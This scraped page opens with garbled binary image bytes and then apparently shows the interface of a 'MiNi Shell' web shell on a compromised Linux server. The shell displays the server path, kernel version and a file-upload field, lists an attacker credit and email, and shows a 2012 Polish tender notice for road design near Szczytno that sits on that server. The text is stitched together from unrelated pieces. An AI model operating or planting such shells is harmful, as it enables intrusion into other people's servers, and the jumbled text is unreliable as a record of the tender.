JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120515/107545-N-2012.html

<p class="kh_header"><b>Szczytno: Opracowanie dokumentacji technicznej przebudowy ciągu drogowego Janowo - Szczytno (drogi - powiatowa, gminna i ul. Gnieźnieńska)</b><br>
<b>Numer ogłoszenia: 107545 - 2012; data zamieszczenia: 15.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Szczytnie , ul. K. Mrongowiusza 2, 12-100 Szczytno, woj. warmińsko-mazurskie, tel. 089 6231495 w. 41, faks 089 6240736.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://szczytno-zdp.bip-wm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji technicznej przebudowy ciągu drogowego Janowo - Szczytno (drogi - powiatowa, gminna i ul. Gnieźnieńska).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest: opracowanie dokumentacji technicznej przebudowy ciągu drogowego Janowo - Szczytno (drogi - powiatowa, gminna i ul. Gnieźnieńska). Lokalizacje projektowanych odcinków dróg: - droga powiatowa nr 1659N od km 0+000 do km 4+736; - droga gminna nr 196005N od km 4+736 do km 5+700; - droga gminna wewnętrzna od km 5+700 do km 6+438; - droga miejska (ulica Gnieźnieńska) od km 6+438 do km 7+460;w tym:- droga powiatowa o długości odcinka 4,736 km;    - droga gminna o długości odcinka 1,702 km;- droga miejska o długości odcinka 1,022 km. Łączna długość odcinków wynosi 7, 460  km.
2. Zakres rzeczowy przedmiotu zamówienia obejmuje następujące opracowania i stadia: 1. Przygotowanie informacji o planowanym przedsięwzięciu  i wystąpienie z wnioskiem do właściwego organu o wydanie decyzji o środowiskowych uwarunkowaniach zgody na realizację inwestycji drogowej. Wykonawca zobowiązany jest do dostarczenia zamawiającemu ww. decyzji - w ilości 1 kpl.;
2. Raport I o oddziaływaniu planowanego przedsięwzięcia na środowisko wymagany do uzyskania decyzji o środowiskowych uwarunkowaniach /jeżeli w postępowaniu o wydanie przedmiotowej decyzji okaże się konieczny/ - w ilości 2 egz.;
3. Raport II o oddziaływaniu planowanego przedsięwzięcia na środowisko wymagany 
do uzyskania decyzji o zezwoleniu na realizację drogi /jeżeli w postępowaniu o wydanie przedmiotowej decyzji okaże się konieczny/ - w ilości 2 egz.;
4. Inwentaryzacja przyrodnicza /jeżeli w postępowaniu o wydanie przedmiotowej decyzji okaże się konieczna/ - w ilości 2 egz.; 5. Mapa do celów projektowych - w ilości 1 egz.; 6. Projekt budowlany - w ilości 6 egz.; 7. Materiały do wniosku o wydanie decyzji  o zezwoleniu na realizację inwestycji drogowej  - w ilości  1 kpl.;
8. Dokumentacja geodezyjna i formalno - prawna związana z nabywaniem nieruchomości -  w ilości 2 kpl.; 9. Dokumentacja geodezyjna i formalno - prawna związana z czasowym zajęciem nieruchomości - w ilości 2 kpl.;10. Projekt wykonawczy - w ilości 6 egz.;11. Kosztorys inwestorski w układzie specyfikacyjnym - w ilości 3 egz.; 12. Przedmiar robót w układzie specyfikacyjnym - w ilości 3 egz.; 
13. Kosztorys ofertowy w układzie specyfikacyjnym - w ilości 3 egz.;
Opracowania projektowe wymienione w pkt. 11÷13 Wykonawca sporządzi oddzielnie dla drogi powiatowej, dla drogi gminnej i dla drogi miejskiej.14. Szczegółowe specyfikacje techniczne - w ilości 3 egz.; 15. Docelowy projekt organizacji ruchu i oznakowania - w ilości 3 egz.; 16. Projekt czasowej organizacji ruchu - w ilości 3 egz.;17. Badania geotechniczne podłoża gruntowego - w ilości 3 egz.;
18. Wersja elektroniczna dokumentacji - 2 płyty CD. 19. Dokonywanie uzupełnień lub wyjaśnień szczegółowych dotyczących opracowywanej dokumentacji w zakresie określonym w pkt 1÷18, na każde żądanie zamawiającego w szczególności w trakcie procedury uzyskiwania decyzji ZRID oraz w trakcie realizowanych robót budowlanych na podstawie opracowywanej dokumentacji, bez dodatkowych roszczeń finansowych.
20. Dla zapewnienia możliwości monitorowania postępu prac projektowych, wykonawca  będzie przedstawiał zamawiającemu do zatwierdzenia zaktualizowane Harmonogramy prac projektowych wg opracowanej przez siebie i zatwierdzonej przez zamawiającego tabeli. Aktualizacja Harmonogramu prac projektowych powinna odbywać się wg następującej procedury: - wykonawca zobowiązany jest do przedłożenia Harmonogramu prac projektowych  w terminie do 2 tygodni od daty podpisania umowy; - wykonawca zobowiązany jest przedkładać zamawiającemu do zatwierdzenia kolejne zaktualizowane Harmonogramy prac projektowych w przypadku opóźnień lub zmian związanych z terminem wykonania poszczególnych elementów dokumentacji  z wyjaśnieniem dlaczego nastąpiły zmiany; - w Harmonogramie prac projektowych wykonawca przedstawi daty wykonania poszczególnych elementów, zgodne z tabelą opracowań projektowych; - wykonawca będzie wykonywał aktualizację zatwierdzonego Harmonogramu prac projektowych na swój koszt.
21. Zamawiający dokonuje płatności  na rzecz wykonawcy w następujący sposób:
- zamawiający przewiduje płatności częściowe za wykonanie przedmiotu zamówienia  w czasie realizacji zamówienia zgodnie z tabelą opracowań projektowych;
- podstawę płatności stanowi protokół zdawczo-odbiorczy podpisany przez przedstawiciela zamawiającego i wykonawcy;- protokół zdawczo - odbiorczy powinien zawierać: datę wystawienia protokołu, nazwę dokumentacji projektowej i oznaczenie umowy, nazwę strony przekazującej  i odbierającej wraz z miejscami na podpisy, nazwy opracowań projektowych będących przedmiotem odbioru wraz z podaniem ilości egzemplarzy, miejsce na wpisanie daty odbioru i zatwierdzonej kwoty wynagrodzenia. 22. Wykonawca - Projektant złoży wraz  z dokumentacją techniczną oświadczenie, że jest on wykonany zgodnie z obowiązującymi przepisami, oraz zasadami wiedzy technicznej wg art. 20 ust. 4 ustawy Prawo budowlane z dnia 7 lipca 1994 r. ( z późniejszymi zmianami). 23. Wykonawca opracuje koncepcję zawierającą plan sytuacyjno - wysokościowy wraz z propozycją rozwiązań  konstrukcyjno - materiałowych oraz orientacyjnym kosztem budowy i przedłoży ją do zatwierdzenia zamawiającemu w terminie  1 miesiąca od dnia podpisania umowy.
3. Założenia projektowe: Stan istniejący:- km 0+000 ÷ 1+100 - nawierzchnia bitumiczna o szerokości 4,0 m, pobocza gruntowe nieuregulowane. Odcinek drogi przebiega w terenie pagórkowatym, leśnym, występuje zadrzewienie leśne w koronie drogi. Nawierzchnia zniszczona, występują spękania poprzeczne i podłużne oraz koleiny. - km 1+100 ÷ 6+370 - nawierzchnia gruntowo - żwirowa o zmiennej szerokości (4,0 ÷  6,0 m). Droga przebiega w terenie płaskim leśnym, w koronie drogi występuje zadrzewienie leśne, po prawej stronie koroną drogi przebiega gazociąg. Nawierzchnia nierówna, występują liczne wyboje i nierówności.- km 6+370 ÷ 7+090 - nawierzchnia z płyt betonowych Trylinka o szerokości 6,2 m, ograniczona obustronnie krawężnikiem betonowym. Nawierzchnia zniszczona, liczne nierówności podłużne i poprzeczne. Pobocze gruntowe nieuregulowane, po prawej stronie w koronie występują słupy oświetleniowe. W jezdni występują studzienki kanalizacji sanitarnej.
- km 7+090 ÷ 7+460 - nawierzchnia bitumiczna o zmiennej szerokości 6,2 ÷ 6,5 m, ograniczona obustronnie krawężnikiem betonowym, po lewej stronie występuje chodnik  z polbruku o długości 245 m i zmiennej szerokości 1,5 ÷ 2,8 m. Po prawej stronie pobocze gruntowe o szerokości 2,5 ÷ 2,8 m. W poboczu zlokalizowane są słupy oświetleniowe. W jezdni oraz chodniku znajduje się kanalizacja sanitarna oraz burzowa. Stan nawierzchni niezadowalający, występują liczne  spękania oraz nierówności. Założenia i warunki techniczne do projektowania rozbudowy drogi:
- kilometraż  projektowanego odcinka: początek od km 0+000, koniec w km 7+460;
- klasa drogi Z;- kategoria ruchu: KR I, KR II - dla drogi powiatowej i drogi gminnej do km 6+150;- kategoria ruchu: KR III, KR IV - dla drogi gminnej od km 6+150 i dla drogi miejskiej; - przekrój półuliczny i uliczny;- nawierzchnia jezdni: od 5,5 m do 6 m;
- pozostałe założenia i warunki dla projektowanej inwestycji dostępne dla Wykonawcy w dodatku nr 10 do SIWZ. 4. Każdy wykonawca winien dokonać wizji lokalnej projektowanych odcinków dróg w celu potwierdzenia stanu istniejącego oraz możliwości technicznych realizacji założeń projektowych zamawiającego. Koszty odwiedzenia miejsca budowy poniesie Wykonawca. 5. Nazwa i kod określony we Wspólnym Słowniku Zamówień: Główny przedmiot: CPV 71322000 - 1 usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od obowiązku wniesienia wadium przez wykonawców</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek posiadania wiedzy i doświadczenia, zamawiający wymaga, by wykonawca wykazał, iż  wykonał (zakończył), w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przynajmniej dwie usługi polegające na opracowaniu dokumentacji projektowej obejmującej budowę/przebudowę drogi klasy co najmniej Z, w tym jedno zadanie w trybie uzyskania Decyzji ZRID. Ocena spełnienia warunku nastąpi na podstawie wypełnionego przez wykonawcę wzoru nr 3 do SIWZ oraz przedstawionych dokumentów, o których mowa w Rozdziale 6 pkt 2.2 SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek dysponowania osobami zdolnymi do wykonania zamówienia, zamawiający wymaga, by wykonawca wykazał co najmniej: 
1 osobę na stanowisko projektanta branży drogowej, posiadającą:
- uprawnienie budowlane do projektowania  w specjalności drogowej bez ograniczeń;
- doświadczenie na stanowisku Projektanta dokumentacji projektowej budowy lub przebudowy dróg klasy minimum Z, na co najmniej 2 zadaniach. 1 osobę na stanowisko projektanta branży sanitarnej, posiadającą: - uprawnienie budowlane do projektowania  w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych bez ograniczeń. 1 osobę na stanowisko projektanta branży elektroenergetycznej, posiadającą: - uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wypełniony formularz oferty wraz z tabelą opracowań projektowych,  pełnomocnictwa w przypadku obowiązku ich złożenia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający działając w oparciu o art. 144 ust. 1 ustawy Prawo zamówień publicznych określa następujące okoliczności, które mogą powodować konieczność wprowadzenia zmian w treści zawartej umowy w stosunku do treści złożonej oferty:
- zmiana terminu realizacji zamówienia z przyczyn nie leżących po stronie wykonawcy (zamawiający m.in. przewiduje możliwość dokonania zmiany postanowień zawartej umowy w zakresie przedłużenia terminu wykonania zadania, jeżeli Projektant z przyczyn niezależnych od niego nie uzyska w terminie decyzji środowiskowej lub innych decyzji administracyjnych oraz uzgodnień, w szczególności ze względu na potrzebę zawieszenia postępowania administracyjnego, naruszenie przez organy uzgadniające terminów załatwienia spraw w postępowaniu administracyjnym. Zmianę postanowień zawartej umowy wprowadzi się aneksem); - zmiana osób odpowiedzialnych za kontakty i nadzór nad realizacją przedmiotu umowy;- wystąpienie oczywistych omyłek pisarskich i rachunkowych w treści umowy.
Zmiany, o których mowa powyżej  dopuszczone będą wyłącznie pod warunkiem złożenia wniosku przez wykonawcę i po akceptacji przez zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://szczytno-zdp.bip-wm.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Szczytnie, ul. Mrongowiusza 2, 12-100 Szczytno, woj. warmińsko-mazurskie, pokój nr 26.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.05.2012 godzina 10:00, miejsce: Zarząd Dróg Powiatowych w Szczytnie, ul. Mrongowiusza 2, 12-100 Szczytno, woj. warmińsko-mazurskie, pokój nr 20 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com